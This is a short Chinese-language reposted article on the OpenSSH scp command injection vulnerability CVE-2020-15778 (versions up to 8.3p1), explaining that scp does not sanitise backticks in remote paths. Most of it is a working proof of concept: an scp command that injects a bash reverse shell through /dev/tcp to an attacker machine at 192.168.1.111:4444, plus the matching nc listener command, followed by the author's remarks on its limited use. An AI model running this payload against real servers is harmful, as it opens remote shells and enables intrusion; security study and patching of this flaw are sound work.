OpenSSH的scp命令注入漏洞(CVE-2020-15778)


OpenSSH的scp命令注入漏洞(CVE-2020-15778)

影響版本:OpenSSH =< 8.3p1

scp 是 secure copy 的縮寫。在linux系統中,scp用於linux之間復制文件和目錄,基於 ssh 登陸進行安全的遠程文件拷貝命令。該命令由openssh的scp.c及其他相關代碼實現。

poc利用:
在向遠程主機拷貝文件時,文件的路徑會追加到本地scp命令后,當執行本地scp命令時,scp不會檢查、過濾和清除文件名。這使得攻擊者執行帶有反引號的有效scp命令時,本地shell還將執行反引號中的命令。

查看OpenSSH的版本
ssh -V

反彈shell:
kali:192.168.1.111
openssh主機:192.168.1.194

scp zwish.php root@192.168.1.194:'`bash -i >& /dev/tcp/192.168.1.111/4444 0>&1`'

kali監聽:nc -lvp 4444

比較雞肋的是需要知道登錄的ssh用戶的密碼。
這里嘗試禁止某個ssh用戶遠程登錄,但他必須經過密碼的身份驗證才能反彈shell,所以可利用的場景實在是想不到
1、網上搜資料說可以在authorized_key文件可以設置允許SCP單不允許SSH實際登陸
2、可能會用在回彈shell


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM